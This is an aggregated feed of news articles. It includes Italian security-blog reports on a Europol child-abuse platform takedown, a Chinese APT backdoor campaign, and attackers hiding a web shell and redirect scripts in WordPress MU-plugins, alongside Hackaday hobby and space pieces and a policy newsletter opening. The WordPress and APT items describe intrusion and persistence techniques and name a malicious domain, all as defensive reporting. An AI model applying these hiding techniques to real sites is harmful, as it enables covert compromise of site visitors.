Oggi i bambini sono un po’ più al sicuro grazie ad una operazione di polizia coordinata da Europol che ha portato alla chiusura di Kidflix. Si tratta di una delle più grandi piattaforme online di sfruttamento sessuale minorile. L’operazione ha condotto a 79 arresti e alla protezione di 39 bambini in tutto il mondo.

In un’azione coordinata senza precedenti, le autorità di oltre 35 paesi hanno messo a tacere Kidflix, una delle più grandi piattaforme pedofile al mondo, nell’ambito di un’operazione internazionale contro lo sfruttamento sessuale dei minori.

L’indagine, supportata da Europol e guidata dalla Polizia Criminale Statale della Baviera (Bayerisches Landeskriminalamt) insieme all’Ufficio Centrale Bavarese per la Repressione dei Reati Informatici (ZCB), ha dimostrato ancora una volta come la cooperazione transfrontaliera sia essenziale nella lotta contro il crimine.

Un Successo Operativo su Scala Globale

Tra aprile 2022 e marzo 2025, ben 1,8 milioni di utenti in tutto il mondo si sono collegati alla piattaforma, rendendola un vero e proprio punto di riferimento per il traffico illecito di materiale pedopornografico. L’11 marzo 2025, le autorità tedesche e olandesi hanno sequestrato il server che, all’epoca, ospitava circa 72.000 video, dando il via a una serie di operazioni che hanno portato all’identificazione di quasi 1.400 sospettati.

Fino ad oggi, 79 individui sono stati arrestati per aver condiviso e distribuito CSAM, e alcuni di loro sono stati coinvolti non solo nel caricamento e nella visione dei video, ma anche in veri e propri abusi sui minori. L’indagine, tuttora in corso, continua a far luce su questa rete criminale che sfrutta la tecnologia per alimentare una delle forme più efferate di sfruttamento.

Una Piattaforma dal Doppio Volto

Kidflix, nata nel 2021 dall’iniziativa di un criminale informatico, ha rapidamente guadagnato popolarità tra i pedofili grazie a un modello di business innovativo e spregiudicato. La piattaforma non si limitava a consentire il download di CSAM: offriva anche la possibilità di trasmettere in streaming file video, con sistemi di pagamento basati su criptovalute convertite in token. Gli utenti potevano guadagnare token caricando contenuti, verificando titoli e descrizioni, e assegnando categorie ai video, che venivano poi resi disponibili in versioni di bassa, media e alta qualità.

Secondo le autorità, su Kidflix sono stati caricati e condivisi ben 91.000 video unici, per una durata complessiva di 6.288 ore, con una media di circa 3,5 nuovi video ogni ora. Questi numeri preoccupanti evidenziano quanto la piattaforma abbia facilitato e amplificato il traffico di materiale illecito, spesso precedentemente sconosciuto alle forze dell’ordine.

Il Ruolo Cruciale dell’Europol e una lezione per il futuro

L’operazione, denominata “Stream“, ha segnato un punto di svolta nella lotta contro lo sfruttamento sessuale dei minori online, rappresentando la più grande azione di questo genere mai condotta da Europol.

Gli analisti del Centro Europeo per la Criminalità Informatica (EC3) hanno fornito un supporto operativo fondamentale, analizzando migliaia di video e incrociando dati in tempo reale per facilitare l’indagine.

La lotta contro il crimine informatico richiede unità, determinazione e una vigilanza costante. La vicenda di Kidflix è un monito e un invito a non abbassare mai la guardia: proteggere i bambini è una responsabilità che riguarda ognuno di noi.

L'articolo Kidflix è crollato! La piattaforma dell’orrore è stata smantellata: 79 arresti e 39 bambini salvati proviene da il blog della sicurezza informatica.

Uno degli autori di Flipper Zero, Pavel Zhovner, ha condiviso i dettagli su come stanno procedendo i lavori su una nuova versione del multi-strumento per hacker: Flipper One. Lo sviluppatore ha pubblicato un video di circa mezz’ora sul suo canale Telegram, in cui parla della creazione di un’interfaccia per il nuovo dispositivo.

Ricordiamo che nel 2020 Flipper Zero è stato annunciato come modello junior nella linea di strumenti di pentesting. All’epoca, Pavel Zhovner dichiarò che Flipper One, era stato progettato come una versione più avanzata per attacchi alle reti cablate e wireless. Si supponeva che l’One avesse tutte le funzionalità dello Zero, più un computer ARM separato con Kali Linux a bordo.

Sebbene da allora non ci fossero praticamente più notizie sullo sviluppo di Flipper One, nel 2023 Pavel Zhovner disse a Dana Shepovalov in un’intervista che erano in corso lavori attivi su Flipper One. “Vogliamo creare una soluzione potente e versatile, combinando FPGA e SDR per consentire la definizione programmabile di qualsiasi protocollo. Tuttavia, resta il dubbio se gli utenti sarebbero disposti ad acquistare un dispositivo dal costo compreso tra 300 e 500 dollari. Per questo motivo, il progetto è ancora in piena fase di ricerca e sviluppo. Ad esempio, la scelta del modulo Wi-Fi non è stata ancora finalizzata, poiché tutti i chip attualmente disponibili e adatti agli attacchi risultano ormai obsoleti”, ha dichiarato Zhovner.

Come si è capito dal nuovo video, la forma del dispositivo è quasi approvata per Flipper One ed è in fase di realizzazione uno schermo personalizzato con una risoluzione di 256×144 pixel. Lo schermo e la risoluzione vengono selezionati in base alla lingua, alle tastiere e alle proporzioni del nuovo prodotto.

Attualmente gli sviluppatori sono impegnati a “inventare un’interfaccia” e a lavorare sull’ergonomia del dispositivo. “Innanzitutto, devi sapere che il dispositivo opera in due modalità. Dispone di un coprocessore, ovvero un microcontrollore sempre attivo, che gestisce alcune funzioni anche quando il sistema principale è spento. In questa modalità, il dispositivo permette di visualizzare il livello di carica e di funzionare come power bank. Quando colleghi un dispositivo a Flipper per la ricarica, il display mostra la potenza erogata e il consumo. Inoltre, può accendere la retroilluminazione dello schermo, attivare i pulsanti e offrire un semplice menu di navigazione. Può persino essere utilizzato come tester USB: basta collegarlo a un alimentatore per verificare l’erogazione di energia. La seconda modalità si attiva quando entra in funzione il processore principale. Il primo passo in questo stato è il caricamento del bootloader, che ti permette di scegliere quale sistema operativo avviare (ad esempio, Android TV, Linux o un’altra variante di Linux). Successivamente, il sistema operativo selezionato si avvia e diventa completamente operativo”, afferma Zhovner nel video.

Attualmente, gli sviluppatori sono giunti alla conclusione che per controllare il dispositivo saranno necessari otto pulsanti: uno stick, un D-pad con un pulsante “OK”, un pulsante Alt+Tab (per passare da un programma all’altro), quattro pulsanti software e un pulsante di accensione.

A giudicare dalla foto pubblicata sul canale Telegram, si suppone che Flipper One avrà questo aspetto.

Lo sviluppatore spiega che, secondo lui, tutti i cyberdeck sono pessimi perché nessuno scrive un’interfaccia grafica specifica per essi e un sistema operativo completo su uno schermo piccolo è semplicemente scomodo da usare. “Nessuno scrive mai una GUI, ma io voglio creare una GUI che implementi le funzionalità di sistema: esegua SystemD, NetworkManager e così via. Più wrapper per il software applicativo. Cioè, una specie di linguaggio nostro, un sottoprocesso Python e un wrapper per i programmi applicativi userspace, e affinché la comunità possa aggiungervi qualcosa. Cioè, oggi hanno creato un wrapper per nmap, domani un wrapper per il programma Traceroute, dopodomani per htop e così via. Mi sembra che sia molto più semplice, quindi mi aspetto che la comunità scriverà molti di questi wrapper per i propri programmi”, afferma Zhovner. Sottolinea che sarebbe fantastico se l’idea di un’interfaccia utente grafica per sistemi embedded potesse evolversi e apportare vantaggi agli sviluppatori terzi.

L'articolo Arriva Flipper One! : Kali Linux, FPGA e SDR in un solo dispositivo? proviene da il blog della sicurezza informatica.

There seems to be nothing a 555 can’t do. We’ve seen it before, but [electronzapdotcom] reminds us you can use a 555 and a few parts to make a reasonable touch switch. The circuit lives on a breadboard, as shown in the video below.

The circuit uses some very large resistors so that noise from your body can overcome the logic level on the trigger and threshold inputs. You can easily adapt this idea if you need a simple touch switch. Though we imagine this circuit wouldn’t work well if you were in a quiet environment. We suspect 50 or 60 Hz hum is coupling through your finger and triggering the pins, but it could be a different effect.

How reliable is it? Beats us. The circuit is a bistable, so essentially your finger pumps a signal into a flip-flop. This is old trick, but could be useful. Of course, if you really need a touch switch, you have plenty of options. You can get little modules. Or, directly measure skin resistance.

youtube.com/embed/IfS6JmnjBhQ?…

hackaday.com/2025/04/02/the-ma…

The plethora of smart home devices available today deliver all manner of opportunities, but it’s fair to say that interfacing with them is more often done in the browser or an app than in the terminal. WattWise from [Naveen Kulandaivelu] is a tool which changes all that, it’s a command-line interface (CLI) for power monitoring smart plugs.

Written in Python, the tool can talk either directly to TP-Link branded smart plugs, or via Home Assistant. It tracks the power consumption with a simple graph, but the exciting part lies in how it can be used to throttle the CPU of a computer in order to use power at the points in the day when it is cheapest. You can find the code in a GitHub repository.

We like the idea of using smart plugs as instruments, even if they may not be the most accurate of measurement tools. It takes them even further beyond the simple functionality and walled-garden interfaces provided by their manufacturers, which in our view can only be a good thing.

Meanwhile, for further reading we’ve looked at smart plugs in detail in the past.

hackaday.com/2025/04/02/monito…

Somewhere in the universe, there’s a place that lists every x86 operating system from scratch. Not just some bootloaders, or just a kernel stub, but documentation to build a fully functional, interrupt-handling, multitasking-capable OS. [Erik Helin and Adam Renberg] did just that by documenting every step in The Little Book About OS Development.

This is not your typical dry academic textbook. It’s a hands-on, step-by-step guide aimed at hackers, tinkerers, and developers who want to demystify kernel programming. The book walks you through setting up your environment, bootstrapping your OS, handling interrupts, implementing virtual memory, and even tackling system calls and multitasking. It provides just enough detail to get you started but leaves room for exploration – because, let’s be honest, half the fun is in figuring things out yourself.

Completeness and structure are two things that make this book stand out. Other OS dev guides may give you snippets and leave you to assemble the puzzle yourself. This book documents the entire process, including common pitfalls. If you’ve ever been lost in the weeds of segmentation, paging, or serial I/O, this is the map you need. You can read it online or fetch it as a single 75-page long PDF.

Mockup photo source: Matthieu Dixte

hackaday.com/2025/04/02/one-bo…

Nel luglio 2024, i ricercatori di ESET hanno rilevato una nuova ondata di attività attribuita al gruppo APT FamousSparrow, noto per aver condotto campagne di cyberespionaggio contro obiettivi governativi e istituzionali di alto profilo. Dopo un apparente periodo di inattività durato dal 2022 al 2024, il gruppo è tornato alla ribalta con nuove varianti del backdoor SparrowDoor, miglioramenti tecnici significativi e un arsenale che ora include anche ShadowPad, impiegato per la prima volta.

Target strategici: USA e Messico nel mirino

L’analisi ESET ha rivelato che FamousSparrow ha compromesso una organizzazione del settore finanziario statunitense e un istituto di ricerca messicano. La scelta dei target non è casuale: entrambi rivestono ruoli strategici, rispettivamente nella geopolitica e nello sviluppo tecnologico della regione. Gli attacchi sono avvenuti tra il 11 e il 25 luglio 2024, sfruttando server vulnerabili e sistemi obsoleti, presumibilmente con versioni di Microsoft Exchange Server e Windows Server non aggiornate.

Evoluzione dello strumento: SparrowDoor 2.0

Due nuove versioni del malware SparrowDoor sono state scoperte durante l’analisi forense. La prima è una versione migliorata del backdoor classico, mentre la seconda è modulare e presenta caratteristiche di parallelizzazione dei comandi, una novità assoluta per il gruppo. Entrambe mostrano un salto di qualità a livello architetturale, riducendo l’uso di codice ridondante e migliorando la capacità di evasione.

Una delle due versioni mostra forti analogie con CrowDoor, un backdoor usato da Earth Estries, altro gruppo APT allineato alla Cina. Questo ha portato i ricercatori a ipotizzare una collaborazione o un framework condiviso all’interno di una più ampia infrastruttura offensiva cinese.

ShadowPad: il malware modulare che si evolve

Per la prima volta nella storia operativa del gruppo, FamousSparrow ha fatto uso di ShadowPad, backdoor modulare inizialmente scoperta nel 2017. ShadowPad è stato già collegato a diversi gruppi sponsorizzati dalla Cina ed è noto per le sue capacità di post-exploitation, grazie a un’architettura plugin-based.

Il suo utilizzo da parte di FamousSparrow rappresenta un cambio di passo e una professionalizzazione degli strumenti adottati, coerente con le recenti tendenze di convergenza tra gruppi APT cinesi.

Persistenza e invisibilità

Uno degli aspetti più interessanti di questa campagna è l’evidenza che FamousSparrow non era inattivo, ma semplicemente sotto il radar. Dal 2022 al 2024, infatti, il gruppo ha continuato a sviluppare e perfezionare i propri tool, segno di una pianificazione strategica a lungo termine e di un’elevata OPSEC (Operational Security). L’attacco mostra inoltre un uso bilanciato di:

• Strumenti custom proprietari (SparrowDoor, HemiGate)
• Malware condivisi (ShadowPad)
• Strumenti open source
• Shell web distribuite su server IIS

Analisi Threat Intelligence

Questi aspetti sono ben rappresentati nella mappa relazionale elaborata dai ricercatori, dove FamousSparrow è posto al centro di un ecosistema che collega paesi colpiti (tra cui Stati Uniti, Messico e Honduras), settori strategici (governo e finanza), e una triade di strumenti offensivi: SparrowDoor, HemiGate e ShadowPad. Quest’ultimo è stato utilizzato dal gruppo per la prima volta, segnando un’evoluzione nella loro dotazione tecnica. ShadowPad, noto per essere un backdoor modulare ad alto potenziale, è già stato impiegato da altri gruppi APT cinesi come APT41, Winnti e Earth Lusca. Il suo impiego da parte di FamousSparrow rafforza l’ipotesi di convergenza tattica e tecnica tra più gruppi APT allineati alla Cina, e viene evidenziato nel grafo attraverso l’interconnessione di numerosi indicatori di compromissione condivisi, IP malevoli e tecniche MITRE ATT&CK.

L’immagine è eloquente anche nel mostrare le evidenze digitali che sostengono l’attribuzione: indirizzi IP, hash di file, e payloads tracciati nella rete. Da notare la presenza di tecniche come T1055 (Injection di codice), T1190 (exploit di servizi esposti), e T1543.003 (persistenza tramite servizi di sistema), tutti usati in combinazione per garantire accesso continuo e capacità di comando e controllo.rna difesa cibernetica.

Conclusioni

La rinnovata attività di FamousSparrow dimostra che i gruppi APT di alto profilo continuano a evolversi, raffinando le proprie tecniche in silenzio e colpendo con precisione chirurgica quando si presentano le condizioni favorevoli. L’integrazione di backdoor avanzati come ShadowPad, lo sviluppo modulare e l’uso di tecniche avanzate come la parallelizzazione dei comandi dimostrano un salto qualitativo nelle capacità offensive.

Per le aziende e le istituzioni, è un chiaro segnale: l’apparente silenzio di un attore APT non va mai scambiato per inattività. La minaccia spesso si cela sotto il livello di rilevamento e agisce con sofisticazione, attendendo il momento giusto per colpire.

L'articolo ShadowPad e SparrowDoor 2.0: la nuova minaccia APT che spia governi e istituzioni proviene da il blog della sicurezza informatica.

Macro pads are handy for opening up your favorite programs or executing commonly used keyboard shortcuts. But why stop there?

That’s what [Jeroen Brinkman] must have been thinking while creating the Programmer’s Macro Pad. Based on the Arduino Pro Micro, this hand-wired pad is unique in that a single press of any of its 16 keys can virtually “type” out multiple lines of text. In this case, it’s a capability that’s being used to prevent the user from having to manually enter in commonly used functions, declarations, and conditional statements.

For example, in the current firmware, pressing the “func” key will type out a boilerplate C function:
int () { //
;
return 0;
}; // f
It will also enter in the appropriate commands to put the cursor where it needs to be so you can actually enter in the function name. The other keys such as “array” and “if” work the same way, saving the user from having to enter (and potentially, even remember) the correct syntax.

The firmware is kept as simple as possible, meaning that the functionality of each key is currently hardcoded. Some kind of tool that would let you add or change macros without having to manually edit the source code and flash it back to the Arduino would be nice…but hey, it is a Programmers Macro Pad, after all.

Looking to speed up your own day-to-day computer usage? We’ve covered a lot of macro pads over the years, we’re confident at least a few of them should catch your eye.

hackaday.com/2025/04/02/progra…

This week, Jonathan Bennett chats with Bashonly about yt-dlp, the audio/video downloader that carries the torch from youtube-dl! Why is this a hard problem, and what does the future hold for this swiss-army knife of video downloading? Watch to find out!

• github.com/bashonly
• github.com/yt-dlp/yt-dlp
• discord.gg/H5MNcFW63r

youtube.com/embed/ed93yLiUqxM?…

Did you know you can watch the live recording of the show right on our YouTube Channel? Have someone you’d like us to interview? Let us know, or contact the guest and have them contact us! Take a look at the schedule here.

play.libsyn.com/embed/episode/…

Direct Download in DRM-free MP3.

If you’d rather read along, here’s the transcript for this week’s episode.

Places to follow the FLOSS Weekly Podcast:

• Spotify
• RSS

Theme music: “Newer Wave” Kevin MacLeod (incompetech.com)

Licensed under Creative Commons: By Attribution 4.0 License

hackaday.com/2025/04/02/floss-…

Tattoos. Body paint. Henna. All these are popular kinds of body art with varying histories and cultural connotations, many going back centuries or even longer. They all have something in common, though—they all change how the body reflects light back to the viewer. What if, instead, body art could shine a light of its very own?

This is the precise topic which [Katherine Connell] came to discuss at the 2024 Hackaday Supercon. Her talk concerns rethinking body art with the use of light emitting diodes—and is both thoroughly modern and aesthetically compelling. Beyond that, it’s an engineering development story with liquid metal and cutting-edge batteries that you simply don’t want to miss!

youtube.com/embed/nitjlnkYz0Q?…

[Katherine] wearing her stick-on LED body art, known as Sprite Lights. Credit: SpriteLights.comIn her quest to create self-glowing body art, [Katherine] invented Sprite Lights. In her own words, “these body safe light up temporary tattoos combine art, flex PCBs, screen printed batteries, and a body-safe adhesive tape.” Basically, you can place them on your skin, and they’ll shine and catch eyes for as long as there’s juice left in the sticker.

The inspiration behind this project was simple. [Katherine] grew up in the 80s, and being exposed to that neon-soaked era gave her a desire to glow-in-the-dark. However, she didn’t want to get into any hardcore body modification—hence, she pursued a non-invasive stick-on solution.

As you might imagine, creating these wasn’t trivial. They need to stick to the skin for long periods of time without causing irritation, while also being lightweight and slim enough to be practical to wear. Indeed, to that end, Sprite Lights are less than 1.5 mm thick—an impressive engineering feat.

Her first attempts involved creating a synthetic skin-like material using latex, with LEDs stuck underneath. However, this wasn’t a particularly desirable solution. Latex allergies are relatively common, and producing the designs took a lot of careful hand-soldering and manual work. It was also difficult to attach the latex to the skin, and to color match it with the wearer to make it look right.
Early experiments with latex had a few flaws.
From there, [Katherine] experimented with 3D-printing thin films with transparent PLA, with LEDs underneath. This was a much quicker way to work, but still didn’t attach well to the skin and had some aesthetic flaws. Another 3D-printing attempt saw [Katherine] create molds to produce transparent silicone films with LEDs embedded underneath, but this again proved very labor intensive and it’s difficult to get silicone to stick to anything, including humans. [Katherine] even tried experimenting with Galinstan, a very off-beat metallic alloy, to make circuits inside flexible silicone. She created viable stretchable circuits but they were not very robust, particularly since the Galinstan tends to melt at body temperature.

Undeterred from early hurdles, [Katherine] persevered with new techniques, using 3D-printing, silicone molds, and even strange gallium alloys to create real glowing body art.Later experiments with copper tape enabled [Katherine] to make flexible circuits a bit more easily. She used a Cricut to cut out traces in copper tape, and then stuck them on clear heat-resistant plastic. From there, she used a Walmart griddle to heat the assembly until solder paste liquified and her components were soldered in place. It required careful attention and speed to avoid melting everything, but it worked.

Having developed decent flexible circuits that could light up, power was next on the agenda. Desiring to create stick-on devices with an ultra-thin form factor, there was no room to include a traditional battery, so [Katherine] had to figure out how to power Sprite Lights effectively. She found flexible batteries from a company called Zinergy that could deliver 3V and 20 mAh. She was able to specify a custom flat round design, with the company able to make them just 0.7mm thick and 55 mm round. They use a compound similar to regular AA batteries, which is screen printed onto one layer of plastic and sealed with another layer on top. The batteries have the benefit of being safe to place on skin, with no risk of explosion or chemical exposure, even if they happen to be punctured or cut while worn. Perhaps the only drawback is that they’re non-rechargeable—they’re safe, but single-use.
Custom ultra-thin non-rechargeable batteries made Sprite Lights possible.
Armed with her new batteries, [Katherine] developed her concept further. She stepped up to using commercially-available flex PCBs produced by JLCPCB, in place of her homebrewed concepts used previously. She combined these with the flexible Zinergy batteries underneath, and custom-made die-cut stickers from MakeStickers on top. This gave her an art layer, an LED circuit layer, and a battery layer underneath, with a hypoallergenic medical tape used as the final layer to stick the assembly to the skin. An intermediate fabric tape layer is included to connect the battery’s contacts to the flex PCB, which is populated with LEDs. By leaving a paper layer on the fabric tape between the contacts, this allows the Sprite Light to remain off until it’s ready to be used. The combination comes in under 1.5 mm thick.

ED NOTE: Grabbed some pictures from the SpriteLights website.

[Katherine] has developed Sprite Lights into a super-clean final product. Credit: SpriteLights.com[Katherine] went through a great deal of iteration and development to get Sprite Lights to where they are today. She notes that you can learn anything online if you put in the work and connect to the right communities—it was through self-directed research that she taught herself the skills to get the project over the line. Beyond that, it’s also worth noting that technology might not be quite up to what you need right now—her project relies heavily on brand-new custom Zinergy batteries to be as thin as possible. Her next challenge is mass production—something she has pursued via a crowd-funding campaign.

Ultimately, Sprite Lights are a super-cool piece of body art. But beyond that, [Katherine] told us the great engineering story behind these astounding self-glowing stickers. As her fine example demonstrates, you can do really cool things if you just keep working at it and teach yourself the right skills along the way!

hackaday.com/2025/04/02/superc…

If you want to dip your toes into the deep, deep water of synth DIY but don’t know where to start, [Atarity] has just the resource for you. He’s compiled a list of 70 wonderful DIY synth and noise-making projects and put them all in one place. And as connoisseurs of the bleepy-bloopy ourselves, we can vouch for his choices here.

The collection runs that gamut from [Ray Wilson]’s “Music From Outer Space” analog oddities, through faithful recreations like Adafruit’s XOXBOX, and on to more modern synths powered by simple microcontrollers or even entire embedded Linux devices. Alongside the links to the original projects, there is also an estimate of the difficulty level, and a handy demo video for every example we tried out.

Our only self-serving complaint is that it’s a little bit light on the Logic Noise / CMOS-abuse side of synth hacking, but there are tons of other non-traditional noisemakers, sound manglers, and a good dose of musically useful devices here. Pick one, and get to work!

hackaday.com/2025/04/02/70-diy…

The list of countries to achieve their own successful orbital space launch is a short one, almost as small as the exclusive club of states that possess nuclear weapons. The Soviet Union was first off the rank in 1957, with the United States close behind in 1958, and a gaggle of other aerospace-adept states followed in the 1960s, 1970s, and 1980s. Italy, Iran, North Korea and South Korea have all joined the list since the dawn of the new millennium.

Absent from the list stands Australia. The proud island nation has never stood out as a player in the field of space exploration, despite offering ground station assistance to many missions from other nations over the years. However, the country has continued to inch its way to the top of the atmosphere, establishing its own space agency in 2018. Since then, development has continued apace, and the country’s first orbital launch appears to be just around the corner.

Space, Down Under

The Australian Space Agency has played an important role in supporting domestic space projects, like the ELO2 lunar rover (also known as “Roo-ver”). Credit: ASA
The establishment of the Australian Space Agency (ASA) took place relatively recently. The matter was seen to be long overdue from an OECD member country; by 2008, Australia was the only one left without a national space agency since previous state authorities had been disbanded in 1996. This was despite many facilities across the country contributing to international missions, providing critical radio downlink services and even welcoming JAXA’s Hayabusa2 spacecraft back to Earth.

Eventually, a groundswell grew, pressuring the government to put Australia on the right footing to seize growing opportunities in the space arena. Things came to a head in 2018, when the government established ASA to “support the growth and transformation of Australia’s space industry.”

ASA would serve a somewhat different role compared to organizations like NASA (USA) and ESA (EU). Many space agencies in other nations focus on developing launch vehicles and missions in-house, collaborating with international partners and aerospace companies in turn to do so. However, for ASA, the agency is more focused on supporting and developing the local space industry rather than doing the engineering work of getting to space itself.

Orbital Upstarts

Just because the government isn’t building its own rockets, doesn’t mean that Australia isn’t trying to get to orbit. That goal is the diehard mission of Gilmour Space Technologies. The space startup was founded in 2013, and established its rocketry program in 2015, and has been marching towards orbit ever since. As is often the way, the journey has been challenging, but the payoff of genuine space flight is growing ever closer.

Gilmour Space moved fast, launching its first hybrid rocket back in 2016. The successful suborbital launch proved to be a useful demonstration of the company’s efforts to produce a rocket that used 3D-printed fuel. This early milestone aided the company to secure investment that would support its push to grander launches at greater scale. The company’s next major launch was planned for 2019, but frustration struck—when the larger One Vision rocket suffered a failure just 7 seconds prior to liftoff. Undeterred, the company continued development of a larger rocket, taking on further investment and signing contracts to launch payloads to orbit in the ensuing years.

youtube.com/embed/5vyhef00ebY?…

Gilmour Space has worked hard to develop its hybrid rocket engines in-house.

With orbital launches and commercial payload deliveries the ultimate goal, it wasn’t enough to just develop a rocket. Working with the Australian government, Gilmour Space established the Bowen Orbital Spaceport in early 2024—a launchpad suitable for the scale of its intended space missions. Located on Queensland’s Gold Coast, it’s just 20 degrees south of the equator—closer than Cape Canaveral, and useful for accessing low- to mid-inclination equatorial orbits. The hope was to gain approval to launch later that year, but thus far, no test flights have taken place. Licensing issues around the launch have meant the company has had to hold back on shooting for orbit.

The rocket with which Gilmour Space intends to get there is called Eris. In Block 1 configuration, it stands 25 meters tall, and is intended to launch payloads up to 300 kg into low-Earth orbits. It’s a three-stage design. It uses four of Gilmour’s Sirius hybrid rocket motors in the first stage, and just one in the second stage. The third stage has a smaller liquid rocket engine of Gilmour’s design, named Phoenix. The rocket was first staged vertically on the launch pad in early 2024, and a later “dress rehearsal” for launch was performed in September, with the rocket fully fueled. However, flight did not take place, as launch permits were still pending from Australia’s Civil Aviation Safety Authority (CASA).

youtube.com/embed/-h8g1CfXopo?…

The Eris rocket was first vertically erected on the launchpad in 2024, but progress towards launch has been slow since then.

After a number of regulatory issues, the company’s first launch of Eris was slated for March 15, 2025. However, that day came and passed, even with CASA approval, as the required approvals were still not available from the Australian Space Agency. Delays have hurt the company’s finances, hampering its ability to raise further funds. As for the rocket itself, hopes for Eris’s performance at this stage remain limited, even if you ask those at Gilmour Space. Earlier this month, founder Adam Gilmour spoke to the Sydney Morning Heraldon his expectations for the initial launch. Realistic about the proposition of hitting orbit on the company first attempt, he expects it to take several launches to achieve, with some teething problems to come. “It’s very hard to test an orbital rocket without just flying it,” he told the Herald. “We don’t have high expectations we’ll get to orbit… I’d personally be happy to get off the pad.”

Despite the trepidation, Eris stands as Australia’s closest shot at hitting the bigtime outside the atmosphere. Government approvals and technical hurdles will still need to be overcome, with the Australian Space Agency noting that the company still has licence conditions to meet before a full launch is approved. Still, before the year is out, Australia might join that vaunted list of nations that have leapt beyond the ground to circle the Earth from above. It will be a proud day when that comes to pass.

hackaday.com/2025/04/02/austra…

Gli analisti di Sucuri hanno scoperto che gli hacker utilizzano la directory MU-plugins (Must-Use Plugins) di WordPress per nascondere codice dannoso ed eseguirlo senza essere rilevati. La tecnica è stata individuata per la prima volta nel febbraio 2025, ma la sua adozione è in crescita: gli aggressori stanno attualmente sfruttando i plugin MU per lanciare tre diversi tipi di codice dannoso.

Questo genere di plugin sono un tipo speciale di plugin di WordPress che vengono eseguiti a ogni caricamento di pagina e non richiedono l’attivazione nel pannello di amministrazione. Si tratta di file PHP memorizzati nella directory wp-content/mu-plugins/ che vengono eseguiti automaticamente quando la pagina viene caricata e non vengono visualizzati nel pannello di amministrazione nella pagina Plugin, a meno che non venga selezionato il filtro Must-Use.

Tali plugin vengono utilizzati, ad esempio, per applicare regole di sicurezza personalizzate su scala dell’intero sito, migliorare le prestazioni, modificare dinamicamente le variabili e così via. Poiché i plugin MU vengono eseguiti a ogni caricamento di pagina e non compaiono nell’elenco dei plugin standard, possono essere utilizzati per eseguire segretamente un’ampia gamma di attività dannose, tra cui il furto di credenziali, l’iniezione di codice dannoso o la modifica dell’output HTML.

Gli specialisti di Sucuri hanno scoperto tre payload che gli aggressori inseriscono nella directory MU-plugins:

• redirect.php : reindirizza i visitatori (esclusi i bot e gli amministratori registrati) a un sito dannoso (updatesnow[.]net) che visualizza una falsa richiesta di aggiornamento del browser per indurre la vittima a scaricare malware;
• index.php : una web shell che funge da backdoor, recuperando ed eseguendo codice PHP da un repository GitHub;
• custom-js-loader.php : carica JavaScript che sostituisce tutte le immagini sul sito con contenuti espliciti e intercetta tutti i link esterni, aprendo invece pop-up fraudolenti.

I ricercatori ritengono che la web shell sia il più pericoloso tra questi esempi, poiché consente agli aggressori di eseguire comandi da remoto sul server, rubare dati e condurre successivi attacchi agli utenti e ai visitatori della risorsa.

Gli altri due tipi di malware hanno maggiori probabilità di danneggiare la reputazione e la SEO di un sito attraverso reindirizzamenti sospetti e tentativi di installare malware sui computer dei visitatori.

Finora i ricercatori di Sucuri non sono riusciti a determinare il metodo esatto con cui sono stati infettati i siti web interessati. Si ritiene che gli aggressori sfruttino vulnerabilità note nei plugin e nei temi di WordPress oppure credenziali di amministratore deboli.

L'articolo Attacco invisibile su WordPress: gli hacker stanno sfruttando i MU-Plugins per colpire i siti web proviene da il blog della sicurezza informatica.

Getting a look at the internals of a garden variety “wall wart” isn’t the sort of thing that’s likely to excite the average Hackaday reader. You’ve probably cracked one open yourself, and even if you haven’t, you’ve likely got a pretty good idea of what’s inside that sealed up brick of plastic. But sometimes a teardown can be just as much about the journey as it is the end result.

Truth be told, we’re not 100% sure if this teardown from [Brian Dipert] over at EDN was meant as an April Fool’s joke or not. Certainly it was posted on the right day, but the style is close enough to some of his previous work that it’s hard to say. In any event, he’s created a visual feast — never in history has an AC/DC adapter been photographed so completely and tastefully.
An Ode to the Diode
[Brian] even goes so far as to include images of the 2.5 lb sledgehammer and paint scraper that he uses to brutally break open the ultrasonic-welded enclosure. The dichotomy between the thoughtful imagery and the savage way [Brian] breaks the device open only adds to the surreal nature of the piece. Truly, the whole thing seems like it should be part of some avant garde installation in SoHo.

After he’s presented more than 20 images of the exterior of the broken wall wart, [Brian] finally gets to looking at the internals. There’s really not much to look at, there’s a few circuit diagrams and an explanation of the theory behind these unregulated power supplies, and then the write-up comes to a close as abruptly as it started.

So does it raise the simple teardown to an art form? We’re not sure, but we know that we’ll never look at a power adapter in quite the same way again.

hackaday.com/2025/04/02/the-lo…

SUPPORTED BY

HELO, GWLEIDYDDIAETH DDIGIDOL YW HYN. For those who don't speak Welsh (like me), that's 'Hello, this is Digital Politics." I'm Mark Scott, and this edition comes to you from an unseasonably warm (well, for the United Kingdom) Welsh coastal village. Normal transmission will resume next week.

— The digital world is increasingly divided between Great Powers. That has left a lot of room for so-called 'middle powers' to exert outsized influence.

— The world of trust and safety is wading through treacherous political waters that will leave many caught between rival national governments.

— Ahead of pending US tariffs to be announced on April 2, it's worth remembering global digital exports have doubled over the last 10 years.

Let's get started.

How to make your mark in digital policymaking

THE UNITED STATES. CHINA. THE EUROPEAN UNION. When it comes to digital, those three make up the trifecta of global powers — for different reasons. The US is home to the world's biggest and most vibrant tech sector — but with few checks for citizens. China's authoritarian control of the internet has fast-tracked new services (and repression) like no other. The EU's world-leading digital regulation offers a third way between outright capitalism and state rule — with a lack of homegrown tech.

Yet in the Digital Great Gate that has engulfed this year, let's take a minute to think about middle powers. Those are the countries like Japan, the UK and Brazil that have sizable domestic markets, exert regional clout due to their size/national expertise and often chart a different path on tech that may be more useful to others caught between the vying interests of China, the US and EU.

It's unrealistic that, say, a Philippines (despite its 100m+ population) is ever going to sit side-by-side next to China to export its own vision of digital across Asia. Ditto goes for Argentina in Latin America. Wouldn't it be better to learn lessons from such middle powers that have created their own way (often with mixed reasons) rather than falling into one of the camps led by the world's three largest digital powers?

If you want to know what that looks like, spend some time in Tokyo. Yes, the world's fourth-largest global economy isn't a slouch when it comes to economic prowess. But its aging population, limited linguistic prowess (sorry to all my Japanese-speaking readers!) and positioning close to China have forced Japan to take some bold swings on digital policymaking that are worth a second look.

**A message from Microsoft** Each day, millions of people use generative AI. Abusive AI-generated content, however, can present risks to vulnerable groups such as women, children, and older adults. In a new white paper, developed in consultation with civil society, we present actionable policy recommendations to promote a safer digital environment.**

